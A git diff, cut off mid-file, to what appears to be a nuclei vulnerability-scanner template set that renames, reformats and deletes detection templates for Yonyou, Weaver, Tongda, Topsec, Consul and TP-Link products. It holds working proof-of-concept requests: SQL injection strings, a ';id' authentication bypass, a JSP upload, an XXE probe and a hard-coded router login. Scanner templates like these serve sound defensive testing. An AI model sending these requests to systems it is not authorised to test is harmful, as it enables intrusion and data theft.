diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml.yaml deleted file mode 100755 index 9a8826fc47..0000000000 --- a/http/cnvd/2021/CNVD-2021-30167.yaml.yaml +++ /dev/null @@ -1,79 +0,0 @@ -id: yonyou-nc-bshservlet-full-check - -info: - name: yonyou-nc-bshservlet-full-check - author: SleepingBag945 - severity: critical - description: 测试所有BshServlet RCE端点 - reference: - - https://github.com/parkourhe/yongYouNC-RCE/blob/master/poc.txt - tags: yonyou,nc - -http: - - method: GET - path: - - "{{BaseURL}}/servlet/~aim/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~alm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ampub/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~arap/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~aum/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~cc/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~cdm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~cmp/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ct/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~dm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~erm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fa/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fac/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fbm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ff/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fip/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fipub/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fp/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fts/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~fvm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~gl/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrhi/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrjf/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrpd/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrpub/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrtrn/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~hrwa/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ia/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~ic/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~iufo/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~modules/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~mpp/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~obm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~pu/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~qc/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~sc/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~scmpub/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so2/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so3/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so4/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so5/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~so6/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~tam/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~tbb/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~to/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uap/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapbd/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapde/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapeai/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapother/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapqe/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapweb/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~uapws/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~vrm/bsh.servlet.BshServlet" - - "{{BaseURL}}/servlet/~yer/bsh.servlet.BshServlet" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "BeanShell Test Servlet" - - type: status - status: - - 200 diff --git a/http/cnvd/2022/CNVD-2022-43245.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml index d2288c9132..8c24236126 100755 --- a/http/cnvd/2022/CNVD-2022-43245.yaml +++ b/http/cnvd/2022/CNVD-2022-43245.yaml @@ -28,12 +28,12 @@ http: matchers: - type: word part: body - words : + words: - "" - type: word part: header - words : + words: - "text/xml" - type: status diff --git a/http/cnvd/2023/CNVD-C-2023-76801.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml index 109fe81cce..dac7a8f899 100644 --- a/http/cnvd/2023/CNVD-C-2023-76801.yaml +++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml @@ -17,7 +17,7 @@ http: {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig", "parameterTypes":["java.lang.Object","java.lang.String"], "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]} - + - | GET /{{randstr_1}}.jsp HTTP/1.1 Host: {{Hostname}} diff --git a/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml b/http/default-logins/tp-link/tplink-r470gp-default-login.yaml similarity index 77% rename from http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml rename to http/default-logins/tp-link/tplink-r470gp-default-login.yaml index 236ef6136b..72a22019ca 100755 --- a/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml +++ b/http/default-logins/tp-link/tplink-r470gp-default-login.yaml @@ -1,14 +1,14 @@ id: tp-link-tl-r470gp-ac-default-login info: - name: TP-LINK TL-R470GP-AC Default weak password + name: TP-LINK TL-R470GP-AC - Default Login author: SleepingBag945 severity: high description: | TP-LINK TL-R470GP-AC 默认口令123456 metadata: fofa-query: title="TL-R470GP-AC" - tags: tp-link,default-login,ac + tags: tp-link,default-login,router http: - raw: @@ -17,18 +17,13 @@ http: Host: {{Hostname}} Content-Type: application/json; charset=UTF-8 X-Requested-With: XMLHttpRequest - Connection: close {"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}} - - matchers-condition: and matchers: - type: word part: body words: - "\"stok\"" - "\"error_code\":0" - condition: and - - + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/other/consul-rexec-rce.yaml b/http/vulnerabilities/other/consul-rexec-rce.yaml deleted file mode 100755 index 921c957519..0000000000 --- a/http/vulnerabilities/other/consul-rexec-rce.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: consul-rexec-rce - -info: - name: Consul Rexec RCE - author: SleepingBag945 - severity: critical - description: | - Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request. - metadata: - fofa-query: protocol="consul(http)" - tags: rce - -http: - - raw: - - | - GET /v1/agent/self HTTP/1.1 - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - '"EnableRemoteScriptChecks":true' - condition: and - - - type: status - status: - - 200 - - -# msf -# search Hashicorp -# exploit/multi/misc/consul_service_exec \ No newline at end of file diff --git a/http/vulnerabilities/other/consul-service-rce.yaml b/http/vulnerabilities/other/consul-service-rce.yaml deleted file mode 100755 index 1b1cf8626e..0000000000 --- a/http/vulnerabilities/other/consul-service-rce.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: consul-service-rce - -info: - name: consul-service-rce - author: SleepingBag945 - severity: critical - description: | - Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request. - metadata: - fofa-query: protocol="consul(http)" - tags: rce - -http: - - raw: - - | - GET /v1/agent/self HTTP/1.1 - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - "\"EnableScriptChecks\": true" - - "\"EnableRemoteScriptChecks\": true" - condition: or - - - type: status - status: - - 200 - - -# msf -# search Hashicorp -# exploit/multi/misc/consul_service_exec \ No newline at end of file diff --git a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml index c18d32766c..e5ac882c42 100755 --- a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml +++ b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml @@ -2,7 +2,7 @@ id: secsslvpn-auth-bypass info: name: Secure Access Gateway SecSSLVPN - Authentication Bypass - author: SleepingBag945 + author: SleepingBag945 severity: high description: | The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability. diff --git a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml index b79048fe2f..593ee80e26 100644 --- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml +++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml @@ -1,5 +1,4 @@ id: ruijie-nbr-fileupload - info: name: Ruijie NBR fileupload.php - Arbitrary File Upload author: SleepingBag945 @@ -28,7 +27,7 @@ http: Content-Type: image/jpeg - + - | GET /ddi/server/upload/{{filename}}.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml index 807bde2465..707562c31c 100644 --- a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml +++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml @@ -57,7 +57,7 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - status_code_2 == 200 - contains(body_2,'{{file-upload}}') - contains(header_2,'text/html') diff --git a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml index 82f2f6d75b..391c58ed0f 100755 --- a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml +++ b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml @@ -27,11 +27,11 @@ http: Host: {{Hostname}} Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b Accept-Encoding: gzip - + --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name="upload"; filename="{{filename}}.xls" Content-Type: application/vnd.ms-excel - + <% out.println("{{string}}");%> --59229605f98b8cf290a7b8908b34616b-- diff --git a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml index 117851a77f..d15db6c37e 100755 --- a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml +++ b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml @@ -1,7 +1,7 @@ id: smartbi-deserialization info: - name: Smartbi windowunloading Interface - Deserialization + name: Smartbi windowunloading Interface - Deserialization author: SleepingBag945 severity: high description: | diff --git a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml index 33ebd44c35..7253a8ede3 100755 --- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml +++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true fofa-query: app="TDXK-通达OA" - tags: tongda,fileupload,intrusive + tags: tongda,fileupload,intrusive,router variables: num: "999999999" @@ -59,6 +59,7 @@ http: matchers-condition: and matchers: - type: word + part: body_2 words: - '{{md5(num)}}' diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml index 0cb10d5fbd..afb03e3809 100755 --- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml @@ -23,15 +23,24 @@ http: title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER= + - | + POST /general/document/index.php/recv/register/insert HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER= + matchers-condition: and matchers: - type: word - part: header + part: header_1 words: - "PHPSESSID=" - "register_for/?rid=" condition: and - - type: status - status: - - 302 \ No newline at end of file + - type: word + part: header_2 + words: + - "register_for/?rid=" + negative: true \ No newline at end of file diff --git a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml deleted file mode 100755 index 6c8589bc4d..0000000000 --- a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: topsec-topapplb-arbitrary-login - -info: - name: Topsec TopAppLB Any account Login - Arbitrary Login - author: SleepingBag945 - severity: high - description: | - Any Account can log in to the background.Enter any account on the login page, the password is ;id - reference: - - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json - metadata: - max-request: 1 - fofa-query: title="TopApp-LB 负载均衡系统" - tags: topsec,topapplb,misconfig - -http: - - raw: - - | - POST /login_check.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - - userName=admin&password=%3Bid - - matchers: - - type: dsl - dsl: - - 'status_code_1 == 302 && contains(header_1,"redirect.php")' - condition: and \ No newline at end of file diff --git a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml index fae8bd88a8..3b9fdb9b40 100755 --- a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml +++ b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml @@ -7,7 +7,7 @@ info: description: | Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`. reference: - - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json + - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json metadata: max-request: 1 verified: true @@ -24,7 +24,7 @@ http: userName=admin&password=%3Bid - | - GET / HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} cookie-reuse: true diff --git a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml index 51231848eb..f765502cec 100755 --- a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml +++ b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml @@ -23,7 +23,7 @@ http: ]> + ]> &xxe; matchers-condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml similarity index 72% rename from http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml rename to http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml index 9812101f1c..2e5f3a1e1f 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml +++ b/http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml @@ -1,15 +1,15 @@ -id: weaver-e-cology-verifyquicklogin-arbitrary-login +id: ecology-verifyquicklogin-auth-bypass info: - name: weaver e-cology verifyquicklogin.jsp arbitrarylogin + name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass author: SleepingBag945 severity: high - description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞,攻击者通过发送特殊的请求包可以获取管理员Session + description: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package. reference: - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html metadata: fofa-query: app="泛微-协同办公OA" - tags: ecology,weaver,oa + tags: ecology,weaver,oa,auth-bypass http: - raw: @@ -23,19 +23,18 @@ http: identifier=1&language=1&ipaddress=x.x.x.x - matchers-condition: and matchers: - type: word part: body words: - "\"sessionkey\":" + - type: word part: body words: - "\"message\":" + - type: status status: - - 200 - -# Enhanced by md on 2022/10/31 + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml index e0a26a518d..a7bf35dcfc 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml @@ -1,34 +1,34 @@ id: weaver-e-cology-validate-sqli info: - name: weaver-e-cology-validate-sqli + name: Weaver e-cology Validate.JSP - SQL Injection author: SleepingBag945 severity: high - description: 泛微e-cology OA系统的validate.jsp文件中,因为对参数capitalid过滤不严,可致使SQL注入漏洞。攻击者运用该漏洞,可在未授权的情况下,远程发送精心构造的SQL语句,从而取得数据库敏感信息。 - tags: ecology,weaver,oa,sqli + description: | + In the validate.jsp file of the Panwei e-cology OA system, the parameter capitalid is not strictly filtered, which can lead to SQL injection vulnerabilities. An attacker can use this vulnerability to remotely send carefully constructed SQL statements without authorization, thereby obtaining sensitive database information. + tags: ecology,weaver,sqli + +variables: + num1: "{{rand_int(40000, 44800)}}" + num2: "{{rand_int(40000, 44800)}}" + result: "{{to_number(num1)*to_number(num2)}}" http: - raw: - | POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10 - + sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{num1}}*{{num2}})&capitalnum=-10 matchers-condition: and matchers: - type: word part: body words: - - "8370114" + - "{{result}}" + - type: status status: - - 200 - -# Enhanced by md on 2022/10/31 -# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录 \ No newline at end of file + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml index 1e63c77915..0f620f1e92 100644 --- a/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml +++ b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml @@ -39,7 +39,15 @@ http: matchers-condition: and matchers: - type: dsl - dsl: + dsl: - status_code == 200 - contains(body,'Windows IP Configuration') + condition: and + + - type: word + part: header + words: + - "application/json" + - "text/html" + negative: true condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml index 4a34c16335..ee7fd28463 100644 --- a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml @@ -35,7 +35,7 @@ http: skip-variables-check: true matchers: - type: dsl - dsl: + dsl: - "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')" - "status_code_2 == 200 && contains(header_2, 'filename=')" - "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)" diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml index a852d8407d..203a8ba0b0 100755 --- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml @@ -21,8 +21,8 @@ variables: http: - method: GET path: - - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)" - - 